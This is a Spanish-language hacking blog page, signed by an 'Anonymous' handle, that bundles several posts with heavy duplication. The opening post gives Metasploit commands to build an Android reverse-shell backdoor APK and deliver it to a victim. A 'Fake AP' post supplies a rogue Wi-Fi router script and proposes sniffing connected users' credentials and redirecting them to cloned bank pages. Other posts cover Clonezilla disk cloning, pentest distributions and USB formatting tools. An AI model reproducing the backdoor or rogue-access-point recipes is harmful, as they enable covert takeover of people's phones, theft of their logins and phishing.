1. Crear un backdoor apk
sudo msfpayload android/meterpreter/reverse_tcp LHOST=[Hacker_IP] LPORT=[Hacker_Port] R > app.apk
2. Correr la consola de Metasploit
msfconsole
3. Correr los siguiente comando para escuchar la conexión de entrada de android
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [Hacker_IP]
set LPORT [Hacker_Port]
4. Enviar el *.apk a la victima con dispositivo Android
5. Esperar que la víctima instale y corra la aplicación
6. Mira tu msfconsole, y se habrá conectado el dispositivo Android
7. Correr cualquier comando post-explotación
X Conocimientos
We are Anonymous We do not forgive We do not forget Expect Us! El conocimiento es libre
Clonar Discos con Clonezilla
Para utilizarlo primero debemos descargar la ultima versión para Live CD desde su pagina web: http://clonezilla.org/downloads.php
Después de descargarlo debemos grabar la imagen descargada en un CD o DVD utilizando cualquier software de grabación.
Después debemos bootear el CD desde la BIOS al encender el ordenador, podremos ver algo así:
En
este caso debemos seleccionar la primera opción llamada “Clonezilla
Live”. La segunda opción da acceso a otros modos de compatibilidad para
arrancar, la tercera llamada “Local operating system in harddrive”
permite arrancar desde el sistema operativo instalado en el disco duro
si existiera, y las ultimas dos opciones “Memtest & Freedos” y
“Network boot via iPXE” permiten arrancar el análisis de memoria y el
arranque por red respectivamente.
Seleccionando la primera opción si todo carga bien debemos ver la siguiente pantalla que nos permite seleccionar el idioma en el que se cargara Clonezilla Live:
Después de seleccionar el idioma debemos seleccionar la distribución de teclado que se cargara:
Al
acabar de seleccionar la distribución de teclado la carga continuara
hasta esta pantalla donde debemos elegir si iniciar Clonezilla Live o
iniciar la consola de comandos. En este caso, seleccionamos
“Start_Clonezilla Iniciar Clonezilla”.
Clonezilla
puede funcionar de dos formas, puede crear clonados de disco a imagen o
de disco/partición a disco/partición. En este caso para la prueba vamos
a seleccionar “device-image Disco/Partición a Imagen” es decir, de
disco a una imagen exactamente igual al disco, si seleccionamos la
otra opción la configuración es mas o menos igual, solo que la copia
se hará de disco a disco.
Después
tendremos que elegir a donde copiar la imagen creada, existen varias
opciones: un dispositivo de almacenamiento local, un servidor SSH, un
servidor SAMBA, un servidor NFS o en el propio disco, aunque no es
recomendable. En este caso vamos a copiarlo a USB. Para eso
seleccionamos la opción ”local_dev Usar dispositivo local”.
Con
el dispositivo previamente conectado le damos a Enter cuando nos lo
pida y si todo funciona correctamente y reconoce el soporte podremos ver
la siguiente pantalla para seleccionar que dispositivo utilizar para
guardar la imagen:
En
este caso seleccionamos SDB1 que es el Pendrive que utilizaremos para
guardar la imagen. Después de seleccionarlo y darle a Enter
nos pedirá en que carpeta crear la imagen, en este caso en la raiz.
Pulsamos
Enter cuando lo requiera (si no lo requiere puede haber un problema) y
nos saldrá una pantalla donde tendremos que elegir en que modo queremos
iniciar el asistente de clonado, el modo principiante no tiene
ninguna complicación ya que acepta todas las opciones por
defecto, así que en este caso elegimos el modo “Expert Modo Experto:
Selecciona tus propias opciones”.
Ahora
nos pedirá si queremos clonar un disco entero o simplemente
una partición. En este caso vamos a clonar el disco completo, así que
seleccionamos la primera opción ”savedisk
Guardar_disco_local_como_imagen” y pulsamos Enter para continuar.
Nos pedirá el nombre que queremos ponerle a la imagen:
Lo
escribimos o lo dejamos por defecto, pulsamos Enter y seleccionamos la
parte mas importante, el disco que queremos clonar. En este caso solo
hay uno virtual, así que lo seleccionamos.
Al
pasar al siguiente paso nos saldrá una pantalla donde se configuran
los parámetros avanzados de Clonezilla Live, si no sabemos a que se
refiere debemos dejar la opción marcada por defecto, ya que
no tendría porque dar problemas. En total debemos aceptar sin tocar nada
en las tres pantallas mostradas a continuación.
En
la ultima parte de parámetros avanzados que podemos ver abajo si que
tendremos que tocar para indicarle a Clonezilla si partir la imagen en
varias partes, para que no la tenga que partir tenemos que poner una
cifra alta, pero con cuidado y siguiendo las indicaciones de Clonezilla
que podemos ver en la pantalla.
Después
de avanzar la siguiente pantalla la podemos omitir, por eso
seleccionamos la primera opción ”Omitir la comprobación/reparación del
sistema”. Sirve para comprobar si hay errores en el sistema de archivos
antes de realizar el clonado, solo tendremos que ejecutar esto si hay
problemas en el clonado.
Elegimos
si Clonezilla Live verificara la imagen al final o no, por seguridad es
recomendable que si, así que seleccionamos “Si, comprobar la imagen
grabada”.
Por
ultimo saldrá la pantalla de abajo donde elegimos que hará Clonezilla
Live al acabar de crear la imagen, en este caso seleccionamos que se
apague el sistema al acabar de crear la imagen.
Por
ultimo, aceptamos cuando lo requiera el asistente y comenzara
la creación de la imagen de clonado con la pantalla de estado como la
imagen de abajo:
Al terminar si hemos seleccionado la opción de que se apague el sistema, el sistema se apagara.
La pagina web oficial de Clonezilla es: http://clonezilla.org/
Clonezilla es software completamente gratuito liberado bajo licencia GPL,
Después de descargarlo debemos grabar la imagen descargada en un CD o DVD utilizando cualquier software de grabación.
Después debemos bootear el CD desde la BIOS al encender el ordenador, podremos ver algo así:
Seleccionando la primera opción si todo carga bien debemos ver la siguiente pantalla que nos permite seleccionar el idioma en el que se cargara Clonezilla Live:
La pagina web oficial de Clonezilla es: http://clonezilla.org/
Clonezilla es software completamente gratuito liberado bajo licencia GPL,
Recopilatorio de Sistemas Operativos de Pen Test
Saludos a todos los lectores.
Hoy les dejamos un recopilatorio de Sistemas Operativos para hacer Pentesting.
¿Que es el pentest?
Pen Test es como comunmente se denomina a los "Test de penetracion" o en inglés "Penetration Tests", y son en conjunto la forma de denominar a una serie de técnicas utilizadas para evaluar la seguridad de redes, sistemas de computación y aplicaciones involucradas en los mismos.
Un Pen Test, no es tarea fácil y requiere de un conocimiento sólido y profundo de las tecnologías involucradas en los sistemas, aplicaciones y servicios, además de una óptica y experiencia amplia en el comportamiento de varios sistemas operativos. Mediante estas técnicas, el Black, White o Ethical Hacker puede descubrir vulnerabilidades en el sistema estudiado, y usarlas para obtener acceso al mismo, por lo que está técnica se diferencia entre otras cosas del "análisis de vulnerabilidades" en que en este último una vez detectadas las vulnerabilidades no son usadas para penetrar el sistema.
Ahora bien, déjeme aclararle un punto importante: Sus sistemas o aplicaciones, por muy bien o mal protegidos que usted crea que se encuentren, pueden ser objeto de un Pen Test con o sin su consentimiento en cualquier momento, por lo que es importante entender que descubrir las fallas de los mismos mediante el uso de las herramientas para ello, puede ser una gran ventaja a la hora de la defenderse de futuros intentos de penetración.
Las herramientas disponibles para efectuar estas pruebas de penetración pasan por varios grados de complejidad, y el manejo de algunas de ellas puede ser todo un reto a la inteligencia y sagacidad del atacante o "pen-tester". Entre ellas se incluyen desde scanners de puertos, complejos algoritmos para descifrar claves, sistemas de intrusión por fuerza bruta, herramientas de sniffing de redes y penetración de firewalls, así como también herramientas de escaneo de vulnerabilidades de aplicaciones web y mucho más. Todo un mundo de aplicaciones en su mayoría desarrolladas para entorno Linux (el entorno preferido para este tipo de trabajo) con las cuales el proceso de intento de penetración se hace mucho más "simple". Estas herramientas suelen estar agrupadas en lo que se conoce como "Toolkits" o juegos de herramientas.
Algunos "toolkits" son muy famosos en el medio por la eficiencia de sus herramientas y por haber sido utilizados en penetraciones de alto nivel a sistemas que se consideraron es su tiempo fortalezas impenetrables. Todos los S.O en formato de LIVE CD o ISO, de forma que las herramientas ya están integradas e instaladas en un CD de arranque del sistema operativo con el que trabajan y son portátiles.
Kali Linux:
De los creadores de la popular distibución GNU/Linux BackTrack llego sistema operativo, Kali Linux, dirigido igualmente a realizar auditorías de seguridad pero enfocado en el sector profesional, siendo como es software libre y totalmente gratuito, que no es lo mismo.
Al igual que sucede con BackTrack, Kali Linux dispone de una amplia variedad de herramientas dedicadas -más de 300-, y de hecho Offensive Security, el equipo tras el desarrollo de la distribución, se ha unido con Rapid7, desarrolladores a su vez del conocido tolokit de penetración Metasploit.
Una diferencia básica entre BackTrack y Kali Linux es que la segunda pasa a utilizar Debian como base, mientras que la primera hace lo propio con Ubuntu. Según sus desarrolladores, “Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere completamente a los estándares de desarrollo de Debian”.
Puedes encontrar más información sobre Kali Linux en la documentación del proyecto (en español), donde se explican los conceptos básicos de la distribución, así como se incluyen guías de introducción y por supuesto los enlaces para descargar la primera versión de esta distro -disponible también para arquitectura ARM- que tiene pinta de convertirse en herramienta indispensable para los expertos en materia de seguridad informática.
Descarga:
http://www.kali.org/downloads/
BackTrack 5
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100
Descargar: http://www.backtrack-linux.org/downloads/
BugTraq Team
Bugtraq sistema ofrece la distribución más amplia, óptima y estable con el administrador de servicios automatizados en tiempo real. Esta distribución basada en el PAE 3.2 y 3.4 del núcleo tiene una amplia gama de penetración, forense y herramientas de laboratorio. Bugtraq está disponible con XFCE, Gnome y KDE basada en Ubuntu, Debian y openSUSE. Los sistemas están disponibles en 11 idiomas diferentes.
Herramientas
Las novedades que nos trae bugtraq son una amplia gama de herramientas en diferentes ramas. Podemos encontrar móviles de las herramientas forenses, laboratorios de pruebas de malware, herramientas de la comunidad de Bugtraq, herramientas de auditoría para GSM, Wifi, Bluetooth y RFID integradas y herramientas de Windows, herramientas centradas en IPv6, y las típicas pentesting y herramientas forenses que no deben faltar en Bugtraq -II.
Referencias del Team - Bugtraq
Bugtraq-Team fue fundada en 2011 y se consolidó en 2012, desde entonces ha evolucionado exponencialmente y hoy todavía hambre de explorar nuevas fronteras. Somos un grupo innovador con diferentes cualificaciones y los conocimientos de seguridad informática ..... Desde nuestros inicios nuestro grupo vivido y aprendido con otros grupos de piratas informáticos conocidos a nivel internacional. También contamos con años de experiencia trabajando en consultoría de seguridad, administración de sistemas Unix, el gesto de incidentes, servicio técnico, y los sitios de redes sociales.
Descargar: http://bugtraq-team.com/downloads.html
PHLAK
PHLAK es un sistema modular de seguridad en vivo distribución Linux. Es un derivado de Morphix. PHLAK espera desarrollar el conjunto de herramientas perfecto para todos los profesionales de la seguridad. Hay dos tipos: Fatman-grande basada en CD iso, Littleboy adelgazado-USB versión pendrive.
Descargar: http://sourceforge.net/projects/phlakproject/
Matriux
Es una distribución de seguridad que consiste en un poderoso conjunto, de herramientas libres y de código abierto que pueden ser utilizadas para varios propósitos incluyendo, pero no limitado a penetration testing, hacking ético, administración de sistemas y redes, investigaciones forenses, pruebas de seguridad, análisis de seguridad, y mucho más. Esta es una distribución diseñada para entusiastas y profesionales de la seguridad, aunque puede utilizarse normalmente como sistema de escritorio.
Descargar: http://www.matriux.com/index.php?page=download
BACKBOX
Pro-activamente proteger su infraestructura de TI con la caja de montaje. Es la solución perfecta seguridad, proporcionando pruebas de lápiz, herramientas de recopilación de respuesta a incidentes, informática forense y la inteligencia. La versión más actual de BackBox Linux incluye las últimas soluciones de software para el análisis de vulnerabilidad / evaluación de las pruebas y de la pluma. Es uno de los más ligeros más rápido / distribuciones de Linux disponibles en Internet.
Descargar: http://www.backbox.org/downloads
WEAKERTH4N
Todavía está en su versión beta, pero el desarrollador ha hecho un buen trabajo para este proyecto que algunas herramientas interesantes Pentesting incluido en esta distro. Se construye a partir de Debian Squeeze y utiliza Fluxbox como entorno de escritorio. Puede instalar esta distro live pentesting utilizando Remastersys instalador personalizado. Tiene una gran cantidad de herramientas inalámbricas a diferencia de BackTrack 5. Tambien tiene las viejas características de Android hacking
Descargar: http://weaknetlabs.com/main/?page_id=479
UbnHD2
Una distribución para realizar pruebas de penetración en dispositivos móviles un SO basado en Ubuntu/Debian para pentesting que se ejecuta de forma nativa en un dispositivo HTC HD2. La distribución de momento está en fase beta y todavía hay algunas opciones que no funcionan.
Descargar: http://sourceforge.net/projects/ubnhd2/?source=dlp
Proximamente mas S.O que estan en desarollo!
Que Sistema Operativo para realizar Pen Test Usas?
¿CUAL ES TU FAVORITO?
Comenta Explicanos tus Conocimientos y experiencias ^^
Un Saludo!
Atentamente @Anonymous_w3c
Hoy les dejamos un recopilatorio de Sistemas Operativos para hacer Pentesting.
¿Que es el pentest?
Pen Test es como comunmente se denomina a los "Test de penetracion" o en inglés "Penetration Tests", y son en conjunto la forma de denominar a una serie de técnicas utilizadas para evaluar la seguridad de redes, sistemas de computación y aplicaciones involucradas en los mismos.
Un Pen Test, no es tarea fácil y requiere de un conocimiento sólido y profundo de las tecnologías involucradas en los sistemas, aplicaciones y servicios, además de una óptica y experiencia amplia en el comportamiento de varios sistemas operativos. Mediante estas técnicas, el Black, White o Ethical Hacker puede descubrir vulnerabilidades en el sistema estudiado, y usarlas para obtener acceso al mismo, por lo que está técnica se diferencia entre otras cosas del "análisis de vulnerabilidades" en que en este último una vez detectadas las vulnerabilidades no son usadas para penetrar el sistema.
Ahora bien, déjeme aclararle un punto importante: Sus sistemas o aplicaciones, por muy bien o mal protegidos que usted crea que se encuentren, pueden ser objeto de un Pen Test con o sin su consentimiento en cualquier momento, por lo que es importante entender que descubrir las fallas de los mismos mediante el uso de las herramientas para ello, puede ser una gran ventaja a la hora de la defenderse de futuros intentos de penetración.
Las herramientas disponibles para efectuar estas pruebas de penetración pasan por varios grados de complejidad, y el manejo de algunas de ellas puede ser todo un reto a la inteligencia y sagacidad del atacante o "pen-tester". Entre ellas se incluyen desde scanners de puertos, complejos algoritmos para descifrar claves, sistemas de intrusión por fuerza bruta, herramientas de sniffing de redes y penetración de firewalls, así como también herramientas de escaneo de vulnerabilidades de aplicaciones web y mucho más. Todo un mundo de aplicaciones en su mayoría desarrolladas para entorno Linux (el entorno preferido para este tipo de trabajo) con las cuales el proceso de intento de penetración se hace mucho más "simple". Estas herramientas suelen estar agrupadas en lo que se conoce como "Toolkits" o juegos de herramientas.
Algunos "toolkits" son muy famosos en el medio por la eficiencia de sus herramientas y por haber sido utilizados en penetraciones de alto nivel a sistemas que se consideraron es su tiempo fortalezas impenetrables. Todos los S.O en formato de LIVE CD o ISO, de forma que las herramientas ya están integradas e instaladas en un CD de arranque del sistema operativo con el que trabajan y son portátiles.
Kali Linux:
De los creadores de la popular distibución GNU/Linux BackTrack llego sistema operativo, Kali Linux, dirigido igualmente a realizar auditorías de seguridad pero enfocado en el sector profesional, siendo como es software libre y totalmente gratuito, que no es lo mismo.
Al igual que sucede con BackTrack, Kali Linux dispone de una amplia variedad de herramientas dedicadas -más de 300-, y de hecho Offensive Security, el equipo tras el desarrollo de la distribución, se ha unido con Rapid7, desarrolladores a su vez del conocido tolokit de penetración Metasploit.
Una diferencia básica entre BackTrack y Kali Linux es que la segunda pasa a utilizar Debian como base, mientras que la primera hace lo propio con Ubuntu. Según sus desarrolladores, “Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere completamente a los estándares de desarrollo de Debian”.
Puedes encontrar más información sobre Kali Linux en la documentación del proyecto (en español), donde se explican los conceptos básicos de la distribución, así como se incluyen guías de introducción y por supuesto los enlaces para descargar la primera versión de esta distro -disponible también para arquitectura ARM- que tiene pinta de convertirse en herramienta indispensable para los expertos en materia de seguridad informática.
Descarga:
http://www.kali.org/downloads/
BackTrack 5
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Se deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix. La última versión de esta distribución cambió el sistema base, antes basado en Slax y ahora en Ubuntu.
Incluye una larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless. Fue incluida en el puesto 7 de la famosa lista "Top 100
Descargar: http://www.backtrack-linux.org/downloads/
BugTraq Team
Bugtraq sistema ofrece la distribución más amplia, óptima y estable con el administrador de servicios automatizados en tiempo real. Esta distribución basada en el PAE 3.2 y 3.4 del núcleo tiene una amplia gama de penetración, forense y herramientas de laboratorio. Bugtraq está disponible con XFCE, Gnome y KDE basada en Ubuntu, Debian y openSUSE. Los sistemas están disponibles en 11 idiomas diferentes.
Herramientas
Las novedades que nos trae bugtraq son una amplia gama de herramientas en diferentes ramas. Podemos encontrar móviles de las herramientas forenses, laboratorios de pruebas de malware, herramientas de la comunidad de Bugtraq, herramientas de auditoría para GSM, Wifi, Bluetooth y RFID integradas y herramientas de Windows, herramientas centradas en IPv6, y las típicas pentesting y herramientas forenses que no deben faltar en Bugtraq -II.
Referencias del Team - Bugtraq
Bugtraq-Team fue fundada en 2011 y se consolidó en 2012, desde entonces ha evolucionado exponencialmente y hoy todavía hambre de explorar nuevas fronteras. Somos un grupo innovador con diferentes cualificaciones y los conocimientos de seguridad informática ..... Desde nuestros inicios nuestro grupo vivido y aprendido con otros grupos de piratas informáticos conocidos a nivel internacional. También contamos con años de experiencia trabajando en consultoría de seguridad, administración de sistemas Unix, el gesto de incidentes, servicio técnico, y los sitios de redes sociales.
Descargar: http://bugtraq-team.com/downloads.html
PHLAK
PHLAK es un sistema modular de seguridad en vivo distribución Linux. Es un derivado de Morphix. PHLAK espera desarrollar el conjunto de herramientas perfecto para todos los profesionales de la seguridad. Hay dos tipos: Fatman-grande basada en CD iso, Littleboy adelgazado-USB versión pendrive.
Descargar: http://sourceforge.net/projects/phlakproject/
Matriux
Es una distribución de seguridad que consiste en un poderoso conjunto, de herramientas libres y de código abierto que pueden ser utilizadas para varios propósitos incluyendo, pero no limitado a penetration testing, hacking ético, administración de sistemas y redes, investigaciones forenses, pruebas de seguridad, análisis de seguridad, y mucho más. Esta es una distribución diseñada para entusiastas y profesionales de la seguridad, aunque puede utilizarse normalmente como sistema de escritorio.
Descargar: http://www.matriux.com/index.php?page=download
BACKBOX
Pro-activamente proteger su infraestructura de TI con la caja de montaje. Es la solución perfecta seguridad, proporcionando pruebas de lápiz, herramientas de recopilación de respuesta a incidentes, informática forense y la inteligencia. La versión más actual de BackBox Linux incluye las últimas soluciones de software para el análisis de vulnerabilidad / evaluación de las pruebas y de la pluma. Es uno de los más ligeros más rápido / distribuciones de Linux disponibles en Internet.
Descargar: http://www.backbox.org/downloads
WEAKERTH4N
Todavía está en su versión beta, pero el desarrollador ha hecho un buen trabajo para este proyecto que algunas herramientas interesantes Pentesting incluido en esta distro. Se construye a partir de Debian Squeeze y utiliza Fluxbox como entorno de escritorio. Puede instalar esta distro live pentesting utilizando Remastersys instalador personalizado. Tiene una gran cantidad de herramientas inalámbricas a diferencia de BackTrack 5. Tambien tiene las viejas características de Android hacking
Descargar: http://weaknetlabs.com/main/?page_id=479
UbnHD2
Una distribución para realizar pruebas de penetración en dispositivos móviles un SO basado en Ubuntu/Debian para pentesting que se ejecuta de forma nativa en un dispositivo HTC HD2. La distribución de momento está en fase beta y todavía hay algunas opciones que no funcionan.
Descargar: http://sourceforge.net/projects/ubnhd2/?source=dlp
Proximamente mas S.O que estan en desarollo!
Que Sistema Operativo para realizar Pen Test Usas?
¿CUAL ES TU FAVORITO?
Comenta Explicanos tus Conocimientos y experiencias ^^
Un Saludo!
Atentamente @Anonymous_w3c
Montando Fake AP
En este post vamos a ver como podríamos crear un punto de acceso WIFI falso aprovechándonos de otra conexión desde Backtrack.
Para ello necesitamos tener instalados una serie de programas como “dhcpd3″ para poder configurar en nuestro equipo el servidor DHCP de la red que vamos a montar.
Lo primero que tenemos que hacer es tener una conexión a internet ya sea por cable o por WIFI (Se recomienda por cable ya que en todas las pruebas realizadas a ido siempre mejor), será esta conexión la que utilizaremos para montar el Fake AP y dar internet a la gente que se conecte a nuestro AP (Access Point), lo cual como veremos al final del post podría dar lugar a un sin fin de posibles ataques…
Una vez tenemos la conexion a internet y el servidor dhcp instalado vamos a ver como montar la WIFI…
Vamos a abrir el programa “Gerix Wifi Cracker” que se encuentra en: “Applications –> Backtrack –> Explotation tools –> Wireless Explotation tools –> WLAN Explotation –> gerix-wifi-cracker-ng”
Nos vamos a la pestaña de “Configuration” y realizamos lo siguiente:
Seleccionamos la interfaz que tenemos (wlan0) y le damos a “Enable/Disable Monitor Mode”. Una vez echo vemos que nos sale una nueva interfaz que es la que nos a creado en modo monitor…
Después de esto seleccionamos la interfaz nueva (mon0) y le damos a “Set random MAC address” para asignarle un dirección MAC aleatoria…
Una vez echo esto pulsamos en “Reload wireless interfaces” y por ultimo en “Clean old session files”…
Ahora que ya tenemos lista la interfaz que vamos a utilizar nos vamos a la pestaña “Fake AP”
(Es importante que la interfaz que dejemos seleccionada en la configuración sea mon0 que es la que utilizaremos para el Fake AP) y dejamos una configuración como la siguiente (En caso de no querer poner contraseña, sino habría que seleccionar la opción que quisiéramos en “Cryptography tags” y asignarle la contraseña a la derecha).
Una vez tenemos la configuración puesta de forma correcta pulsamos sobre “Start Fake Access Point” y vemos que nos aparece lo siguiente…
Una vez echo esto ya tendríamos un punto de acceso montado, y si miramos desde otro dispositivo vemos que la red ya esta creada, pero ahora lo que nos falta es configurar de forma correcta nuestro PC para que haga de router y dhcp. Para ello podemos utilizar el siguiente script que nos automatiza la tarea…
Tras ejecutar el script ya tendríamos el Fake AP listo (En caso de que utilizáramos eth0 como conexión a internet para montar el Fake AP, en otro caso tendríamos que modificar el script de eth0 por wlan0), permitiendo que la gente se pudiera conectar con nosotros y pudiendo realizar todos los posibles ataques que pudiéramos pensar como analizar todo el trafico que pasa por nosotros (Que es todo) para obtener credenciales de redes sociales, correos, etc…
Podríamos montar una pagina falsa haciendo una copia de cualquier otra como por ejemplo un banco o una red social y hacer que las personas fueran redirigidas montando también un DNS en nuestro ordenador e indicando a las victimas en la configuración del DHCP que ese es el DNS correcto, podríamos intentar explotar algún tipo de vulnerabilidad al estar dentro de la misma red, etc…
Para ello necesitamos tener instalados una serie de programas como “dhcpd3″ para poder configurar en nuestro equipo el servidor DHCP de la red que vamos a montar.
Lo primero que tenemos que hacer es tener una conexión a internet ya sea por cable o por WIFI (Se recomienda por cable ya que en todas las pruebas realizadas a ido siempre mejor), será esta conexión la que utilizaremos para montar el Fake AP y dar internet a la gente que se conecte a nuestro AP (Access Point), lo cual como veremos al final del post podría dar lugar a un sin fin de posibles ataques…
Una vez tenemos la conexion a internet y el servidor dhcp instalado vamos a ver como montar la WIFI…
Vamos a abrir el programa “Gerix Wifi Cracker” que se encuentra en: “Applications –> Backtrack –> Explotation tools –> Wireless Explotation tools –> WLAN Explotation –> gerix-wifi-cracker-ng”
Nos vamos a la pestaña de “Configuration” y realizamos lo siguiente:
Seleccionamos la interfaz que tenemos (wlan0) y le damos a “Enable/Disable Monitor Mode”. Una vez echo vemos que nos sale una nueva interfaz que es la que nos a creado en modo monitor…
Después de esto seleccionamos la interfaz nueva (mon0) y le damos a “Set random MAC address” para asignarle un dirección MAC aleatoria…
Una vez echo esto pulsamos en “Reload wireless interfaces” y por ultimo en “Clean old session files”…
Ahora que ya tenemos lista la interfaz que vamos a utilizar nos vamos a la pestaña “Fake AP”
(Es importante que la interfaz que dejemos seleccionada en la configuración sea mon0 que es la que utilizaremos para el Fake AP) y dejamos una configuración como la siguiente (En caso de no querer poner contraseña, sino habría que seleccionar la opción que quisiéramos en “Cryptography tags” y asignarle la contraseña a la derecha).
Una vez tenemos la configuración puesta de forma correcta pulsamos sobre “Start Fake Access Point” y vemos que nos aparece lo siguiente…
Una vez echo esto ya tendríamos un punto de acceso montado, y si miramos desde otro dispositivo vemos que la red ya esta creada, pero ahora lo que nos falta es configurar de forma correcta nuestro PC para que haga de router y dhcp. Para ello podemos utilizar el siguiente script que nos automatiza la tarea…
# Crear la interfaz virtual y configurar el DHCP: ifconfig at0 up ifconfig at0 192.168.2.129 netmask 255.255.255.128 route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129 dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 /etc/init.d/dhcp3-server start
# Configurando iptables siendo eth0 la red utilizada actualmente por nosotros
para acceder a internet: iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward iptables --flush && iptables --table nat --flush && iptables --delete-chain && iptables
--table nat --delete-chain && iptables --table nat --append POSTROUTING --out-interface eth0
-j MASQUERADE && iptables --append FORWARD --in-interface at0 -j ACCEPT && echo 1 >
/proc/sys/net/ipv4/ip_forward
Tras ejecutar el script ya tendríamos el Fake AP listo (En caso de que utilizáramos eth0 como conexión a internet para montar el Fake AP, en otro caso tendríamos que modificar el script de eth0 por wlan0), permitiendo que la gente se pudiera conectar con nosotros y pudiendo realizar todos los posibles ataques que pudiéramos pensar como analizar todo el trafico que pasa por nosotros (Que es todo) para obtener credenciales de redes sociales, correos, etc…
Podríamos montar una pagina falsa haciendo una copia de cualquier otra como por ejemplo un banco o una red social y hacer que las personas fueran redirigidas montando también un DNS en nuestro ordenador e indicando a las victimas en la configuración del DHCP que ese es el DNS correcto, podríamos intentar explotar algún tipo de vulnerabilidad al estar dentro de la misma red, etc…
Restaurar capacidad almacenamiento del PENDRIVE
Hoy les venimos a traer 2 programas de gran utilidad para formatear un pendrive que este corrupto o se haya encogido la memoria de almacenamiento por X movitivos.
1.HP USB Disk Storage Format Tool
HP USB Disk Storage Format Tool, es una herramienta destinada al formateo de los discos rigidos. Con ella podrás formatear tus memorias o discos USB en formato FAT32 o NTFS .
A diferencia del asistente de Windows, HPv USB Disk Storage Format Tool puede formatear discos de tamaño superior a 32 gigabytes como es el caso del FAT32.
Si dispones de una instalación de MS-DOS o de sus ficheros de instalación, con HP USB Disk Storage Format Tool también podrás formatear la unidad con opción de arranque, como si fuera un CD.
Descargar HP USB Disk Storage Format Tool (Opcion 1)
Descargar HP USB Disk Storage Format Tool (Opcion 2)
Descargar HP USB Disk Storage Format Tool (Opcion 3)
2.HDD Low Level Format Tool
"HDD Low Level Format Tool", lo he instalado (funciona en Windows7) y ejecutado.
Selecciono el USB en cuestión y pulso en "Continue". Me aparece la siguiente ventana:
Pulso en la segunda pestaña "Low-Level Format" y pulso en el botón "FORMAT THIS DEVICE":
Me pide confirmación y acepto. Una vez haya formateado el pendrive me aparece una ventana que el formateo se ha realizado y que tendré que crear una partición y formatear la unidad:
Yo he tenido que sacar y volver a introducir el pendrive en la unidad USB para que me reconozca los 8Gb, además, automáticamente me pide que le de formato:
Le digo que sí y lo formateo:
..y listo, ya tengo preparado mi pendrive para ser usado como antes.
Descargar HDD Low Level Format Tool Opcion 1
Descargar HDD Low Level Format Tool Opcion 2
Descargar HDD Low Level Format Tool Opcion 3
Espero que sirva de algo.
1.HP USB Disk Storage Format Tool
HP USB Disk Storage Format Tool, es una herramienta destinada al formateo de los discos rigidos. Con ella podrás formatear tus memorias o discos USB en formato FAT32 o NTFS .
A diferencia del asistente de Windows, HPv USB Disk Storage Format Tool puede formatear discos de tamaño superior a 32 gigabytes como es el caso del FAT32.
Si dispones de una instalación de MS-DOS o de sus ficheros de instalación, con HP USB Disk Storage Format Tool también podrás formatear la unidad con opción de arranque, como si fuera un CD.
Descargar HP USB Disk Storage Format Tool (Opcion 1)
Descargar HP USB Disk Storage Format Tool (Opcion 2)
Descargar HP USB Disk Storage Format Tool (Opcion 3)
2.HDD Low Level Format Tool
"HDD Low Level Format Tool", lo he instalado (funciona en Windows7) y ejecutado.
Selecciono el USB en cuestión y pulso en "Continue". Me aparece la siguiente ventana:
Pulso en la segunda pestaña "Low-Level Format" y pulso en el botón "FORMAT THIS DEVICE":
Me pide confirmación y acepto. Una vez haya formateado el pendrive me aparece una ventana que el formateo se ha realizado y que tendré que crear una partición y formatear la unidad:
Yo he tenido que sacar y volver a introducir el pendrive en la unidad USB para que me reconozca los 8Gb, además, automáticamente me pide que le de formato:
Le digo que sí y lo formateo:
..y listo, ya tengo preparado mi pendrive para ser usado como antes.
Descargar HDD Low Level Format Tool Opcion 1
Descargar HDD Low Level Format Tool Opcion 2
Descargar HDD Low Level Format Tool Opcion 3
Espero que sirva de algo.
Kali Linux > Password Attacks > Offline Atacks
Kali Linux > Password Attacks > Offline Atacks
hashcat
Recuperación de contraseñas basada en CPU
| |||
Suscribirse a:
Entradas (Atom)